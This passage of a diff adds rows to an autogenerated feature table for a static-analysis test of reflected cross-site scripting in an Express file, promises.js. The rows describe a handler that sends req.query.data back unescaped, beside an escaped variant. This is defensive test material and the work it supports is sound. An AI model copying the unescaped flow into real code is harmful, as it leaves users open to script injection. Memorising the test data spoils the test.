contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:1:1:1:0 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:1:1:1:1 | require | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:11 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:32 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:1:5:1:32 | express ... press') | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:21 | require | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:32 | exceptional return of require('express') | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:1:15:1:32 | require('express') | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/promises.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/promises.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/promises.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/promises.js:1:23:1:31 | 'express' | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:7 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:19 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:2:5:2:19 | app = express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:17 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:19 | exceptional return of express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:2:11:2:19 | express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:4:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:4:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:4:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:4:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:4:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:4:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:11:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:11:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:11:2 | app.get ... / OK\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:11:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:11:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:1:11:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:5:4:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:5:4:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:5:4:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:4:9:4:20 | "/some/path" | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/promises.js:4:9:4:20 | "/some/path" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:4:9:4:20 | "/some/path" | calleeImports | express | @@ -21824,6 +145247,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:4:9:4:20 | "/some/path" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/promises.js:4:9:4:20 | "/some/path" | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:4:9:4:20 | "/some/path" | receiverName | app | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | req | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | res | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:4:23 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | 'arguments' object of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -21831,6 +145269,139 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | (req, r ... // OK\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | exceptional return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | exceptional return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:23:11:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:24:4:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:4:29:4:31 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | exceptional return of new Pro ... .data)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | exceptional return of new Pro ... .data)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | exceptional return of new Pro ... .data)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | exceptional return of new Pro ... .data)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | exceptional return of new Pro ... .data)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | new Pro ... .data)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | new Pro ... .data)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | new Pro ... .data)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | new Pro ... .data)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:5:59 | new Pro ... .data)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:9 | new Pro ... .then | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:9 | new Pro ... .then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:9 | new Pro ... .then | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:9 | new Pro ... .then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:9 | new Pro ... .then | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | exceptional return of new Pro ... end(x)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | exceptional return of new Pro ... end(x)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | exceptional return of new Pro ... end(x)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | exceptional return of new Pro ... end(x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | exceptional return of new Pro ... end(x)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | new Pro ... end(x)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | new Pro ... end(x)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | new Pro ... end(x)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | new Pro ... end(x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:3:6:27 | new Pro ... end(x)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:7:5:13 | Promise | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:7:5:13 | Promise | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:5:7:5:13 | Promise | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:7:5:13 | Promise | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:7:5:13 | Promise | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:14 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:14 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:14 | req | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:14 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | 'arguments' object of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | (resolv ... y.data) | CalleeFlexibleAccessPath | Promise | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | (resolv ... y.data) | InputArgumentIndex | 0 | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | (resolv ... y.data) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | (resolv ... y.data) | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | (resolv ... y.data) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | (resolv ... y.data) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | (resolv ... y.data) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | exceptional return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | exceptional return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:15:5:58 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:16:5:22 | resolve | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:25:5:30 | reject | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:25:5:30 | reject | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:25:5:30 | reject | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:25:5:30 | reject | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:25:5:30 | reject | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:42 | resolve | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:42 | resolve | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:42 | resolve | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:42 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:42 | resolve | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | exceptional return of resolve ... y.data) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | exceptional return of resolve ... y.data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | exceptional return of resolve ... y.data) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | exceptional return of resolve ... y.data) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | exceptional return of resolve ... y.data) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | resolve ... y.data) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | resolve ... y.data) | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | resolve ... y.data) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | resolve ... y.data) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:36:5:58 | resolve ... y.data) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:46 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:46 | req | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:46 | req | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:46 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:46 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:52 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:52 | req.query | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:52 | req.query | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:52 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:44:5:52 | req.query | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:5:44:5:57 | req.query.data | CalleeFlexibleAccessPath | resolve | | autogenerated/Xss/ReflectedXss/promises.js:5:44:5:57 | req.query.data | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:5:44:5:57 | req.query.data | contextFunctionInterfaces | | @@ -21838,6 +145409,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:5:44:5:57 | req.query.data | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | | autogenerated/Xss/ReflectedXss/promises.js:5:44:5:57 | req.query.data | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/promises.js:5:44:5:57 | req.query.data | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:48:5:52 | query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:48:5:52 | query | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:48:5:52 | query | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:48:5:52 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:48:5:52 | query | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:5:54:5:57 | data | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:5:54:5:57 | data | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:5:54:5:57 | data | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:5:54:5:57 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:5:54:5:57 | data | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:6:6:9 | then | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:6:6:9 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:6:6:6:9 | then | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:6:6:9 | then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:6:6:9 | then | fileImports | express | +| 